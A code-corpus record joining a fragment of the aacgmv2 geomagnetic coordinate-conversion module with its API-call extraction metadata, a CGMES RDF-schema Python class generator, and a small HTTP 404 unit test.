GEOCENTRIC - assume inputs are geocentric w/ RE=6371.2
(default = "TRACE")
(default = "TRACE")
Returns
-------
mlat : (float)
magnetic latitude in degrees N
mlon : (float)
magnetic longitude in degrees E
mlt : (float)
magnetic local time in hours
"""
# Initialize method code
method_code = "G2A|{:s}".format(method)
# Get magnetic lat and lon.
mlat, mlon, _ = convert_latlon_arr(glat, glon, height, dtime,
method_code=method_code)
if np.any(np.isfinite(mlon)):
# Get magnetic local time
mlt = convert_mlt(mlon, dtime, m2a=False)
else:
mlt = np.full(shape=len(mlat), fill_value=np.nan)
return mlat, mlon, mlt
def convert_str_to_bit(method_code):
"""convert string code specification to bit code specification
Parameters
----------
method_code : (str)
Bitwise code for passing options into converter (default=0)
G2A - geographic (geodetic) to AACGM-v2
A2G - AACGM-v2 to geographic (geodetic)
TRACE - use field-line tracing, not coefficients
ALLOWTRACE - use trace only above 2000 km
BADIDEA - use coefficients above 2000 km
GEOCENTRIC - assume inputs are geocentric w/ RE=6371.2
Returns
-------
bit_code : (int)
Method code specification in bits
Notes
-----
Multiple codes should be seperated by pipes '|'. Invalid parts of the code
are ignored and no code defaults to 'G2A'.
"""
convert_code = {"G2A": c_aacgmv2.G2A, "A2G": c_aacgmv2.A2G,
"TRACE": c_aacgmv2.TRACE, "BADIDEA": c_aacgmv2.BADIDEA,
"GEOCENTRIC": c_aacgmv2.GEOCENTRIC,
"ALLOWTRACE": c_aacgmv2.ALLOWTRACE}
# Force upper case, remove any spaces, and split along pipes
method_codes = method_code.upper().replace(" ", "").split("|")
# Add the valid parts of the code, invalid elements are ignored
bit_code = sum([convert_code[k] for k in method_codes
if k in convert_code.keys()])
return bit_code
def convert_bool_to_bit(a2g=False, trace=False, allowtrace=False,
badidea=False, geocentric=False):
"""convert boolian flags to bit code specification
Parameters
----------
a2g : (bool)
True for AACGM-v2 to geographic (geodetic), False otherwise
(default=False)
trace : (bool)
If True, use field-line tracing, not coefficients (default=False)
allowtrace : (bool)
If True, use trace only above 2000 km (default=False)
badidea : (bool)
If True, use coefficients above 2000 km (default=False)
geocentric : (bool)
True for geodetic, False for geocentric w/RE=6371.2 (default=False)
Returns
-------
bit_code : (int)
code specification in bits
"""
bit_code = c_aacgmv2.A2G if a2g else c_aacgmv2.G2A
if trace:
bit_code += c_aacgmv2.TRACE
if allowtrace:
bit_code += c_aacgmv2.ALLOWTRACE
if badidea:
bit_code += c_aacgmv2.BADIDEA
if geocentric:
bit_code += c_aacgmv2.GEOCENTRIC
return bit_code
def convert_mlt(arr, dtime, m2a=False):
"""Converts between magnetic local time (MLT) and AACGM-v2 longitude
Parameters
----------
arr : (array-like or float)
Magnetic longitudes (degrees E) or MLTs (hours) to convert
dtime : (array-like or datetime.datetime)
Date and time for MLT conversion in Universal Time (UT).
m2a : (bool)
Convert MLT to AACGM-v2 longitude (True) or magnetic longitude to MLT
(False). (default=False)
Returns
-------
out : (np.ndarray)
Converted coordinates/MLT in degrees E or hours (as appropriate)
Notes
-----
This routine previously based on Laundal et al. 2016, but now uses the
improved calculation available in AACGM-V2.4.
"""
arr = np.asarray(arr)
if arr.shape == ():
arr = np.array([arr])
if len(arr.shape) > 1:
raise ValueError("unable to process multi-dimensional arrays")
# Test time
try:
dtime = test_time(dtime)
years = [dtime.year for dd in arr]
months = [dtime.month for dd in arr]
days = [dtime.day for dd in arr]
hours = [dtime.hour for dd in arr]
minutes = [dtime.minute for dd in arr]
seconds = [dtime.second for dd in arr]
except ValueError as verr:
dtime = np.asarray(dtime)
if dtime.shape == ():
raise ValueError(verr)
elif dtime.shape != arr.shape:
raise ValueError("array input for datetime and MLon/MLT must match")
years = [dd.year for dd in dtime]
months = [dd.month for dd in dtime]
days = [dd.day for dd in dtime]
hours = [dd.hour for dd in dtime]
minutes = [dd.minute for dd in dtime]
seconds = [dd.second for dd in dtime]
arr = list(arr)
# Calculate desired location, C routines set date and time
if m2a:
# Get the magnetic longitude
if len(arr) == 1:
out = c_aacgmv2.inv_mlt_convert(years[0], months[0], days[0],
hours[0], minutes[0], seconds[0],
arr[0])
else:
out = c_aacgmv2.inv_mlt_convert_arr(years, months, days, hours,
minutes, seconds, arr)
else:
# Get magnetic local time
if len(arr) == 1:
out = c_aacgmv2.mlt_convert(years[0], months[0], days[0], hours[0],
minutes[0], seconds[0], arr[0])
out = np.array([out])
else:
out = np.array(c_aacgmv2.mlt_convert_arr(years, months, days, hours,
minutes, seconds, arr))
return out
| [
"numpy.clip",
"numpy.array",
"sys.exc_info",
"numpy.isfinite",
"aacgmv2.logger.error",
"os.unsetenv",
"aacgmv2._aacgmv2.set_datetime",
"datetime.time",
"aacgmv2._aacgmv2.mlt_convert",
"numpy.asarray",
"numpy.nanmax",
"aacgmv2._aacgmv2.mlt_convert_arr",
"aacgmv2._aacgmv2.convert",
"numpy.abs",
"aacgmv2._aacgmv2.inv_mlt_convert_arr",
"aacgmv2._aacgmv2.inv_mlt_convert",
"numpy.any",
"numpy.isnan",
"numpy.sign",
"numpy.full",
"aacgmv2.logger.warning"
] | [((9933, 9949), 'numpy.array', 'np.array', (['in_lat'], {}), '(in_lat)\n', (9941, 9949), True, 'import numpy as np\n'), ((9963, 9979), 'numpy.array', 'np.array', (['in_lon'], {}), '(in_lon)\n', (9971, 9979), True, 'import numpy as np\n'), ((9993, 10009), 'numpy.array', 'np.array', (['height'], {}), '(height)\n', (10001, 10009), True, 'import numpy as np\n'), ((11752, 11798), 'numpy.full', 'np.full', ([], {'shape': 'in_lat.shape', 'fill_value': 'np.nan'}), '(shape=in_lat.shape, fill_value=np.nan)\n', (11759, 11798), True, 'import numpy as np\n'), ((11813, 11859), 'numpy.full', 'np.full', ([], {'shape': 'in_lon.shape', 'fill_value': 'np.nan'}), '(shape=in_lon.shape, fill_value=np.nan)\n', (11820, 11859), True, 'import numpy as np\n'), ((11872, 11918), 'numpy.full', 'np.full', ([], {'shape': 'height.shape', 'fill_value': 'np.nan'}), '(shape=height.shape, fill_value=np.nan)\n', (11879, 11918), True, 'import numpy as np\n'), ((19913, 19928), 'numpy.asarray', 'np.asarray', (['arr'], {}), '(arr)\n', (19923, 19928), True, 'import numpy as np\n'), ((2351, 2421), 'aacgmv2.logger.warning', 'aacgmv2.logger.warning', (['"""conversion not intended for altitudes < 0 km"""'], {}), "('conversion not intended for altitudes < 0 km')\n", (2373, 2421), False, 'import aacgmv2\n'), ((2930, 2956), 'aacgmv2.logger.error', 'aacgmv2.logger.error', (['estr'], {}), '(estr)\n', (2950, 2956), False, 'import aacgmv2\n'), ((3391, 3417), 'aacgmv2.logger.error', 'aacgmv2.logger.error', (['estr'], {}), '(estr)\n', (3411, 3417), False, 'import aacgmv2\n'), ((7300, 7402), 'aacgmv2._aacgmv2.set_datetime', 'c_aacgmv2.set_datetime', (['dtime.year', 'dtime.month', 'dtime.day', 'dtime.hour', 'dtime.minute', 'dtime.second'], {}), '(dtime.year, dtime.month, dtime.day, dtime.hour,\n dtime.minute, dtime.second)\n', (7322, 7402), True, 'import aacgmv2._aacgmv2 as c_aacgmv2\n'), ((7620, 7671), 'aacgmv2._aacgmv2.convert', 'c_aacgmv2.convert', (['in_lat', 'in_lon', 'height', 'bit_code'], {}), '(in_lat, in_lon, height, bit_code)\n', (7637, 7671), True, 'import aacgmv2._aacgmv2 as c_aacgmv2\n'), ((12487, 12515), 'numpy.clip', 'np.clip', (['in_lat', '(-90.0)', '(90.0)'], {}), '(in_lat, -90.0, 90.0)\n', (12494, 12515), True, 'import numpy as np\n'), ((12663, 12765), 'aacgmv2._aacgmv2.set_datetime', 'c_aacgmv2.set_datetime', (['dtime.year', 'dtime.month', 'dtime.day', 'dtime.hour', 'dtime.minute', 'dtime.second'], {}), '(dtime.year, dtime.month, dtime.day, dtime.hour,\n dtime.minute, dtime.second)\n', (12685, 12765), True, 'import aacgmv2._aacgmv2 as c_aacgmv2\n'), ((13308, 13325), 'numpy.array', 'np.array', (['lat_out'], {}), '(lat_out)\n', (13316, 13325), True, 'import numpy as np\n'), ((13344, 13361), 'numpy.array', 'np.array', (['lon_out'], {}), '(lon_out)\n', (13352, 13361), True, 'import numpy as np\n'), ((13378, 13393), 'numpy.array', 'np.array', (['r_out'], {}), '(r_out)\n', (13386, 13393), True, 'import numpy as np\n'), ((13522, 13537), 'numpy.any', 'np.any', (['bad_ind'], {}), '(bad_ind)\n', (13528, 13537), True, 'import numpy as np\n'), ((15091, 15105), 'numpy.isnan', 'np.isnan', (['mlon'], {}), '(mlon)\n', (15099, 15105), True, 'import numpy as np\n'), ((16469, 16486), 'numpy.isfinite', 'np.isfinite', (['mlon'], {}), '(mlon)\n', (16480, 16486), True, 'import numpy as np\n'), ((19967, 19982), 'numpy.array', 'np.array', (['[arr]'], {}), '([arr])\n', (19975, 19982), True, 'import numpy as np\n'), ((4337, 4371), 'os.unsetenv', 'os.unsetenv', (['"""AACGM_v2_DAT_PREFIX"""'], {}), "('AACGM_v2_DAT_PREFIX')\n", (4348, 4371), False, 'import os\n'), ((4821, 4847), 'os.unsetenv', 'os.unsetenv', (['"""IGRF_COEFFS"""'], {}), "('IGRF_COEFFS')\n", (4832, 4847), False, 'import os\n'), ((7130, 7145), 'numpy.sign', 'np.sign', (['in_lat'], {}), '(in_lat)\n', (7137, 7145), True, 'import numpy as np\n'), ((8009, 8037), 'aacgmv2.logger.warning', 'aacgmv2.logger.warning', (['estr'], {}), '(estr)\n', (8031, 8037), False, 'import aacgmv2\n'), ((10640, 10658), 'numpy.array', 'np.array', (['[in_lat]'], {}), '([in_lat])\n', (10648, 10658), True, 'import numpy as np\n'), ((10680, 10698), 'numpy.array', 'np.array', (['[in_lon]'], {}), '([in_lon])\n', (10688, 10698), True, 'import numpy as np\n'), ((10720, 10738), 'numpy.array', 'np.array', (['[height]'], {}), '([height])\n', (10728, 10738), True, 'import numpy as np\n'), ((12245, 12262), 'numpy.nanmax', 'np.nanmax', (['height'], {}), '(height)\n', (12254, 12262), True, 'import numpy as np\n'), ((13412, 13429), 'numpy.array', 'np.array', (['bad_ind'], {}), '(bad_ind)\n', (13420, 13429), True, 'import numpy as np\n'), ((20454, 20471), 'numpy.asarray', 'np.asarray', (['dtime'], {}), '(dtime)\n', (20464, 20471), True, 'import numpy as np\n'), ((21096, 21198), 'aacgmv2._aacgmv2.inv_mlt_convert', 'c_aacgmv2.inv_mlt_convert', (['years[0]', 'months[0]', 'days[0]', 'hours[0]', 'minutes[0]', 'seconds[0]', 'arr[0]'], {}), '(years[0], months[0], days[0], hours[0], minutes[0\n ], seconds[0], arr[0])\n', (21121, 21198), True, 'import aacgmv2._aacgmv2 as c_aacgmv2\n'), ((21314, 21399), 'aacgmv2._aacgmv2.inv_mlt_convert_arr', 'c_aacgmv2.inv_mlt_convert_arr', (['years', 'months', 'days', 'hours', 'minutes', 'seconds', 'arr'], {}), '(years, months, days, hours, minutes, seconds, arr\n )\n', (21343, 21399), True, 'import aacgmv2._aacgmv2 as c_aacgmv2\n'), ((21531, 21628), 'aacgmv2._aacgmv2.mlt_convert', 'c_aacgmv2.mlt_convert', (['years[0]', 'months[0]', 'days[0]', 'hours[0]', 'minutes[0]', 'seconds[0]', 'arr[0]'], {}), '(years[0], months[0], days[0], hours[0], minutes[0],\n seconds[0], arr[0])\n', (21552, 21628), True, 'import aacgmv2._aacgmv2 as c_aacgmv2\n'), ((21683, 21698), 'numpy.array', 'np.array', (['[out]'], {}), '([out])\n', (21691, 21698), True, 'import numpy as np\n'), ((1065, 1075), 'datetime.time', 'dt.time', (['(0)'], {}), '(0)\n', (1072, 1075), True, 'import datetime as dt\n'), ((7760, 7774), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (7772, 7774), False, 'import sys\n'), ((11048, 11092), 'numpy.full', 'np.full', ([], {'shape': '(max_len,)', 'fill_value': 'in_lat'}), '(shape=(max_len,), fill_value=in_lat)\n', (11055, 11092), True, 'import numpy as np\n'), ((11190, 11234), 'numpy.full', 'np.full', ([], {'shape': '(max_len,)', 'fill_value': 'in_lon'}), '(shape=(max_len,), fill_value=in_lon)\n', (11197, 11234), True, 'import numpy as np\n'), ((11332, 11376), 'numpy.full', 'np.full', ([], {'shape': '(max_len,)', 'fill_value': 'height'}), '(shape=(max_len,), fill_value=height)\n', (11339, 11376), True, 'import numpy as np\n'), ((12348, 12362), 'numpy.abs', 'np.abs', (['in_lat'], {}), '(in_lat)\n', (12354, 12362), True, 'import numpy as np\n'), ((21740, 21816), 'aacgmv2._aacgmv2.mlt_convert_arr', 'c_aacgmv2.mlt_convert_arr', (['years', 'months', 'days', 'hours', 'minutes', 'seconds', 'arr'], {}), '(years, months, days, hours, minutes, seconds, arr)\n', (21765, 21816), True, 'import aacgmv2._aacgmv2 as c_aacgmv2\n'), ((12388, 12402), 'numpy.abs', 'np.abs', (['in_lat'], {}), '(in_lat)\n', (12394, 12402), True, 'import numpy as np\n')] |
import os
import xmltodict
from time import time
import json
import logging
logger = logging.getLogger(__name__)
class RDFSEntry:
def __init__(self, jsonObject):
self.jsonDefinition = jsonObject
return
def asJson(self):
jsonObject = {}
if self.about() != None:
jsonObject['about'] = self.about()
if self.comment() != None:
jsonObject['comment'] = self.comment()
if self.dataType() != None:
jsonObject['dataType'] = self.dataType()
if self.domain() != None:
jsonObject['domain'] = self.domain()
if self.fixed() != None:
jsonObject['isFixed'] = self.fixed()
if self.label() != None:
jsonObject['label'] = self.label()
if self.multiplicity() != None:
jsonObject['multiplicity'] = self.multiplicity()
if self.range() != None:
jsonObject['range'] = self.range()
if self.stereotype() != None:
jsonObject['stereotype'] = self.stereotype()
if self.type() != None:
jsonObject['type'] = self.type()
if self.subClassOf() != None:
jsonObject['subClassOf'] = self.subClassOf()
if self.inverseRole() != None:
jsonObject['inverseRole'] = self.inverseRole()
if self.associationUsed() != None:
jsonObject['associationUsed'] = self.associationUsed()
return jsonObject
def about(self):
if '$rdf:about' in self.jsonDefinition:
return RDFSEntry._get_rid_of_hash(RDFSEntry._get_about_or_resource(self.jsonDefinition['$rdf:about']))
else:
return None
def associationUsed(self):
if 'cims:AssociationUsed' in self.jsonDefinition:
return RDFSEntry._extract_string(self.jsonDefinition['cims:AssociationUsed'])
else:
return None
def comment(self):
if 'rdfs:comment' in self.jsonDefinition:
return RDFSEntry._extract_text(self.jsonDefinition['rdfs:comment']).replace('–', '-').replace('“', '"')\
.replace('”', '"').replace('’', "'").replace('°', '[SYMBOL REMOVED]').replace('º', '[SYMBOL REMOVED]').replace('\n', ' ')
else:
return None
def dataType(self):
if 'cims:dataType' in self.jsonDefinition:
return RDFSEntry._extract_string(self.jsonDefinition['cims:dataType'])
else:
return None
def domain(self):
if 'rdfs:domain' in self.jsonDefinition:
return RDFSEntry._get_rid_of_hash(RDFSEntry._extract_string(self.jsonDefinition['rdfs:domain']))
else:
return None
def fixed(self):
if 'cims:isFixed' in self.jsonDefinition:
return RDFSEntry._get_literal(self.jsonDefinition['cims:isFixed'])
else:
return None
def inverseRole(self):
if 'cims:inverseRoleName' in self.jsonDefinition:
return RDFSEntry._get_rid_of_hash(RDFSEntry._extract_string(self.jsonDefinition['cims:inverseRoleName']))
else:
return None
def label(self):
if 'rdfs:label' in self.jsonDefinition:
return RDFSEntry._extract_text(self.jsonDefinition['rdfs:label']).replace('–', '-').replace('“', '"')\
.replace('”', '"').replace('’', "'").replace('°', '').replace('\n', ' ')
else:
return None
def multiplicity(self):
if 'cims:multiplicity' in self.jsonDefinition:
return RDFSEntry._get_rid_of_hash(RDFSEntry._extract_string(self.jsonDefinition['cims:multiplicity']))
else:
return None
def range(self):
if 'rdfs:range' in self.jsonDefinition:
return RDFSEntry._extract_string(self.jsonDefinition['rdfs:range'])
else:
return None
def stereotype(self):
if 'cims:stereotype' in self.jsonDefinition:
return RDFSEntry._extract_string(self.jsonDefinition['cims:stereotype'])
else:
return None
def type(self):
if 'rdf:type' in self.jsonDefinition:
return RDFSEntry._extract_string(self.jsonDefinition['rdf:type'])
else:
return None
def subClassOf(self):
if 'rdfs:subClassOf' in self.jsonDefinition:
return RDFSEntry._get_rid_of_hash(RDFSEntry._extract_string(self.jsonDefinition['rdfs:subClassOf']))
else:
return None
# Extracts the text out of the dictionary after xmltodict, text is labeled by key '_'
def _extract_text(object_dic):
if isinstance(object_dic, list):
return object_dic[0]['_']
elif '_' in object_dic.keys():
return object_dic['_']
else:
return ""
# Extract String out of list or dictionary
def _extract_string(object_dic):
if isinstance(object_dic, list):
if len(object_dic) > 0:
if type(object_dic[0]) == 'string' or isinstance(object_dic[0], str):
return object_dic[0]
return RDFSEntry._get_about_or_resource(object_dic[0])
return RDFSEntry._get_about_or_resource(object_dic)
# The definitions are often contained within a string with a name
# such as "$rdf:about" or "$rdf:resource", this extracts the
# useful bit
def _get_literal(object_dic):
if '$rdfs:Literal' in object_dic:
return object_dic['$rdfs:Literal']
return object_dic
# The definitions are often contained within a string with a name
# such as "$rdf:about" or "$rdf:resource", this extracts the
# useful bit
def _get_about_or_resource(object_dic):
if '$rdf:resource' in object_dic:
return object_dic['$rdf:resource']
elif '$rdf:about' in object_dic:
return object_dic['$rdf:about']
elif '$rdfs:Literal' in object_dic:
return object_dic['$rdfs:Literal']
return object_dic
# Some names are encoded as #name or http://some-url#name
# This function returns the name
def _get_rid_of_hash(name):
tokens = name.split('#')
if len(tokens) == 1:
return tokens[0]
if len(tokens) > 1:
return tokens[1]
return name
class CIMComponentDefinition:
def __init__(self, rdfsEntry):
self.attribute_list = []
self.comment = rdfsEntry.comment()
self.instance_list = []
self.origin_list = []
self.super = rdfsEntry.subClassOf()
self.subclasses = []
def attributes(self):
return self.attribute_list
def addAttribute(self, attribute):
self.attribute_list.append(attribute)
def has_instances(self):
return len(self.instance_list) > 0
def instances(self):
return self.instance_list
def addInstance(self, instance):
instance['index'] = len(self.instance_list)
self.instance_list.append(instance)
def addAttributes(self, attributes):
for attribute in attributes:
self.attribute_list.append(attribute)
def origins(self):
return self.origin_list
def addOrigin(self, origin):
self.origin_list.append(origin)
def superClass(self):
return self.super
def addSubClass(self, name):
self.subclasses.append(name)
def subClasses(self):
return self.subclasses
def setSubClasses(self, classes):
self.subclasses = classes
def _simple_float_attribute(attr):
if 'dataType' in attr:
return attr['label'] == 'value' and attr['dataType'] == '#Float'
return False
def is_a_float(self):
simple_float = False
for attr in self.attribute_list:
if CIMComponentDefinition._simple_float_attribute(attr):
simple_float = True
for attr in self.attribute_list:
if not CIMComponentDefinition._simple_float_attribute(attr):
simple_float = False
if simple_float:
return True
candidate_array = { 'value': False, 'unit': False, 'multiplier': False }
for attr in self.attribute_list:
key = attr['label']
if key in candidate_array:
candidate_array[key] = True
else:
return False
for key in candidate_array:
if candidate_array[key] == False:
return False
return True
def get_profile_name(descriptions):
for list_elem in descriptions:
# only for CGMES-Standard
rdfsEntry = RDFSEntry(list_elem)
if rdfsEntry.stereotype() == 'Entsoe':
return rdfsEntry.about()
def get_short_profile_name(descriptions):
for list_elem in descriptions:
# only for CGMES-Standard
rdfsEntry = RDFSEntry(list_elem)
if rdfsEntry.label() == 'shortName':
return rdfsEntry.fixed()
short_package_name = {}
def _parse_rdf(input_dic):
classes_map = {}
package_name = []
attributes = []
instances = []
# Generates list with dictionaries as elements
descriptions = input_dic['rdf:RDF']['rdf:Description']
short_package_name[get_profile_name(descriptions)] = get_short_profile_name(descriptions)
# Iterate over list elements
for list_elem in descriptions:
rdfsEntry = RDFSEntry(list_elem)
object_dic = rdfsEntry.asJson()
if rdfsEntry.type() != None:
if rdfsEntry.type() == 'http://www.w3.org/2000/01/rdf-schema#Class':
# Class
if rdfsEntry.label() in classes_map:
logger.info("Class {} already exists".format(rdfsEntry.label()))
if rdfsEntry.label() != "String":
classes_map[rdfsEntry.label()] = CIMComponentDefinition(rdfsEntry);
elif rdfsEntry.type() == "http://www.w3.org/1999/02/22-rdf-syntax-ns#Property":
# Property -> Attribute
# We might not have read all the classes yet, so we just make a big list of all attributes
attributes.append(object_dic)
elif rdfsEntry.type() != "http://iec.ch/TC57/1999/rdf-schema-extensions-19990926#ClassCategory":
instances.append(object_dic)
# only for CGMES-Standard
if rdfsEntry.stereotype() != None:
if rdfsEntry.stereotype() == 'Entsoe':
# Record the type, which will be [PackageName]Version
package_name.append(rdfsEntry.about())
# Add attributes to corresponding class
for attribute in attributes:
clarse = attribute['domain']
if clarse and classes_map[clarse]:
classes_map[clarse].addAttribute(attribute)
else:
logger.info("Class {} for attribute {} not found.".format(clarse, attribute))
# Add instances to corresponding class
for instance in instances:
clarse = RDFSEntry._get_rid_of_hash(instance['type'])
if clarse and clarse in classes_map:
classes_map[clarse].addInstance(instance)
else:
logger.info("Class {} for instance {} not found.".format(clarse, instance))
return {package_name[0]: classes_map}
# This function extracts all information needed for the creation of the python class files like the comments or the
# class name. After the extraction the function write_files is called to write the files with the template engine
# chevron
def _write_python_files(elem_dict, langPack, outputPath, version):
float_classes = {}
enum_classes = {}
# Iterate over Classes
for class_definition in elem_dict:
if elem_dict[class_definition].is_a_float():
float_classes[class_definition] = True
if elem_dict[class_definition].has_instances():
enum_classes[class_definition] = True
langPack.set_float_classes(float_classes)
langPack.set_enum_classes(enum_classes)
for class_name in elem_dict.keys():
class_details = {
"attributes": _find_multiple_attributes(elem_dict[class_name].attributes()),
"ClassLocation": langPack.get_class_location(class_name, elem_dict, outputPath),
"class_name": class_name,
"class_origin": elem_dict[class_name].origins(),
"instances": elem_dict[class_name].instances(),
"has_instances": elem_dict[class_name].has_instances(),
"is_a_float": elem_dict[class_name].is_a_float(),
"langPack": langPack,
"sub_class_of": elem_dict[class_name].superClass(),
"sub_classes": elem_dict[class_name].subClasses(),
}
# extract comments
if elem_dict[class_name].comment:
class_details['class_comment'] = elem_dict[class_name].comment
for attribute in class_details['attributes']:
if "comment" in attribute:
attribute["comment"] = attribute["comment"].replace('"', "`")
attribute["comment"] = attribute["comment"].replace("'", "`")
_write_files(class_details, outputPath, version)
def get_rid_of_hash(name):
tokens = name.split('#')
if len(tokens) == 1:
return tokens[0]
if len(tokens) > 1:
return tokens[1]
return name
def format_class(_range, _dataType):
if _range == '':
return get_rid_of_hash(_dataType)
else:
return get_rid_of_hash(_range)
def _write_files(class_details, outputPath, version):
class_details['langPack'].setup(outputPath)
if class_details['sub_class_of'] == None:
# If class has no subClassOf key it is a subclass of the Base class
class_details['sub_class_of'] = class_details['langPack'].base['base_class']
class_details['class_location'] = class_details['langPack'].base['class_location'](version)
class_details['super_init'] = False
else:
# If class is a subclass a super().__init__() is needed
class_details['super_init'] = True
# The entry dataType for an attribute is only set for basic data types. If the entry is not set here, the attribute
# is a reference to another class and therefore the entry dataType is generated and set to the multiplicity
for i in range(len(class_details['attributes'])):
if 'dataType' not in class_details['attributes'][i].keys() and 'multiplicity' in class_details['attributes'][i].keys():
class_details['attributes'][i]['dataType'] = class_details['attributes'][i]['multiplicity']
for attr in class_details['attributes']:
_range = ""
_dataType = ""
if 'range' in attr:
_range = attr['range']
if 'dataType' in attr:
_dataType = attr['dataType']
attr['class_name'] = format_class( _range, _dataType )
class_details['langPack'].run_template( outputPath, class_details )
# Find multiple entries for the same attribute
def _find_multiple_attributes(attributes_array):
merged_attributes = []
for elem in attributes_array:
found = False
for i in range(len(merged_attributes)):
if elem['label'] == merged_attributes[i]['label']:
found = True
break
if found is False:
merged_attributes.append(elem)
return merged_attributes
# If multiple CGMES schema files for one profile are read, e.g. Equipment Core and Equipment Core Short Circuit
# this function merges these into one profile, e.g. Equipment, after this function only one dictionary entry for each
# profile exists. The profiles_array contains one entry for each CGMES schema file which was read.
def _merge_profiles(profiles_array):
profiles_dict = {}
# Iterate through array elements
for elem_dict in profiles_array:
# Iterate over profile names
for profile_key in elem_dict.keys():
if profile_key in profiles_dict.keys():
# Iterate over classes and check for multiple class definitions
for class_key in elem_dict[profile_key]:
if class_key in profiles_dict[profile_key].keys():
# If class already exists in packageDict add attributes to attributes array
if len(elem_dict[profile_key][class_key].attributes()) > 0:
attributes_array = elem_dict[profile_key][class_key].attributes()
profiles_dict[profile_key][class_key].addAttributes(attributes_array)
# If class is not in packageDict, create entry
else:
profiles_dict[profile_key][class_key] = elem_dict[profile_key][class_key]
# If package name not in packageDict create entry
else:
profiles_dict[profile_key] = elem_dict[profile_key]
return profiles_dict
# This function merges the classes defined in all profiles into one class with all attributes defined in any profile.
# The origin of the class definitions and the origin of the attributes of a class are tracked and used to generate
# the possibleProfileList used for the serialization.
def _merge_classes(profiles_dict):
class_dict = {}
# Iterate over profiles
for package_key in profiles_dict.keys():
# get short name of the profile
short_name = ""
if package_key in short_package_name:
if type(short_package_name[package_key]) is dict and '_' in short_package_name[package_key]:
short_name = short_package_name[package_key]['_']
else:
short_name = short_package_name[package_key]
else:
short_name = package_key
# iterate over classes in the current profile
for class_key in profiles_dict[package_key]:
# class already defined?
if class_key not in class_dict:
# store class and class origin
class_dict[class_key] = profiles_dict[package_key][class_key]
class_dict[class_key].addOrigin({'origin': short_name})
for attr in class_dict[class_key].attributes():
# store origin of the attributes
attr['attr_origin'] = [{'origin': short_name}]
else:
# some inheritance information is stored only in one of the packages. Therefore it has to be checked
# if the subClassOf attribute is set. See for example TopologicalNode definitions in SV and TP.
if not class_dict[class_key].superClass():
if profiles_dict[package_key][class_key].superClass():
class_dict[class_key].super = profiles_dict[package_key][class_key].superClass()
# check if profile is already stored in class origin list
multiple_origin = False
for origin in class_dict[class_key].origins():
if short_name == origin['origin']:
# origin already stored
multiple_origin = True
break
if not multiple_origin:
class_dict[class_key].addOrigin({'origin': short_name})
for attr in profiles_dict[package_key][class_key].attributes():
# check if attribute is already in attributes list
multiple_attr = False
for attr_set in class_dict[class_key].attributes():
if attr['label'] == attr_set['label']:
# attribute already in attributes list, check if origin is new
multiple_attr = True
for origin in attr_set['attr_origin']:
multiple_attr_origin = False
if origin['origin'] == short_name:
multiple_attr_origin = True
break
if not multiple_attr_origin:
# new origin
attr_set['attr_origin'].append({'origin': short_name})
break
if not multiple_attr:
# new attribute
attr['attr_origin'] = [{'origin': short_name}]
class_dict[class_key].addAttribute(attr)
return class_dict
def recursivelyAddSubClasses(class_dict, class_name):
newSubClasses = []
theClass = class_dict[class_name]
for name in theClass.subClasses():
newSubClasses.append(name)
newNewSubClasses = recursivelyAddSubClasses(class_dict, name)
newSubClasses = newSubClasses + newNewSubClasses
return newSubClasses
def addSubClassesOfSubClasses(class_dict):
for className in class_dict:
class_dict[className].setSubClasses(recursivelyAddSubClasses(class_dict, className))
def cim_generate(directory, outputPath, version, langPack):
"""Generates cgmes python classes from cgmes ontology
This function uses package xmltodict to parse the RDF files. The parse_rdf function sorts the classes to
the corresponding packages. Since multiple files can be read, e.g. Equipment Core and Equipment Short Circuit, the
classes of these profiles are merged into one profile with the merge_profiles function. After that the merge_classes
function merges classes defined in multiple profiles into one class and tracks the origin of the class and their
attributes. This information is stored in the class variable possibleProfileList and used for serialization.
For more information see the cimexport function in the cimpy package. Finally the
write_python_files function extracts all information needed for the creation of the python files and creates them
with the template engine chevron. The attribute version of this function defines the name of the folder where the
created classes are stored. This folder should not exist and is created in the class generation procedure.
:param directory: path to RDF files containing cgmes ontology, e.g. directory = "./examples/cgmes_schema/cgmes_v2_4_15_schema"
:param outputPath: CGMES version, e.g. version = "cgmes_v2_4_15"
:param langPack: python module containing language specific functions
"""
profiles_array = []
t0 = time()
# iterate over files in the directory and check if they are RDF files
for file in os.listdir(directory):
if file.endswith(".rdf"):
logger.info('Start of parsing file \"%s\"', file)
file_path = os.path.join(directory, file)
xmlstring = open(file_path, encoding="utf8").read()
# parse RDF files and create a dictionary from the RDF file
parse_result = xmltodict.parse(xmlstring, attr_prefix="$", cdata_key="_", dict_constructor=dict)
parsed = _parse_rdf(parse_result)
profiles_array.append(parsed)
# merge multiple profile definitions into one profile
profiles_dict = _merge_profiles(profiles_array)
# merge classes from different profiles into one class and track origin of the classes and their attributes
class_dict_with_origins = _merge_classes(profiles_dict)
# work out the subclasses for each class by noting the reverse relationship
for className in class_dict_with_origins:
superClassName = class_dict_with_origins[className].superClass();
if superClassName != None:
if superClassName in class_dict_with_origins:
superClass = class_dict_with_origins[superClassName];
superClass.addSubClass(className)
else:
print("No match for superClass in dict: :", superClassName)
# recursively add the subclasses of subclasses
addSubClassesOfSubClasses(class_dict_with_origins)
# get information for writing python files and write python files
_write_python_files(class_dict_with_origins, langPack, outputPath, version)
logger.info('Elapsed Time: {}s\n\n'.format(time() - t0))
| [
"logging.getLogger",
"os.listdir",
"xmltodict.parse",
"os.path.join",
"time.time"
] | [((86, 113), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (103, 113), False, 'import logging\n'), ((22466, 22472), 'time.time', 'time', ([], {}), '()\n', (22470, 22472), False, 'from time import time\n'), ((22564, 22585), 'os.listdir', 'os.listdir', (['directory'], {}), '(directory)\n', (22574, 22585), False, 'import os\n'), ((22708, 22737), 'os.path.join', 'os.path.join', (['directory', 'file'], {}), '(directory, file)\n', (22720, 22737), False, 'import os\n'), ((22902, 22988), 'xmltodict.parse', 'xmltodict.parse', (['xmlstring'], {'attr_prefix': '"""$"""', 'cdata_key': '"""_"""', 'dict_constructor': 'dict'}), "(xmlstring, attr_prefix='$', cdata_key='_', dict_constructor\n =dict)\n", (22917, 22988), False, 'import xmltodict\n'), ((24171, 24177), 'time.time', 'time', ([], {}), '()\n', (24175, 24177), False, 'from time import time\n')] |
import unittest
import requests
from tests.functional.api.testing_utils import base_url
from uuid import uuid4
class TestCatchAll(unittest.TestCase):
def test_root(self):
resp = requests.get(base_url)
self.assertEqual(404, resp.status_code)
# TODO test fails
# def test_sub_path(self):
# resp = requests.get(base_url+"/"+uuid4().hex)
# self.assertEqual(404, resp.status_code)
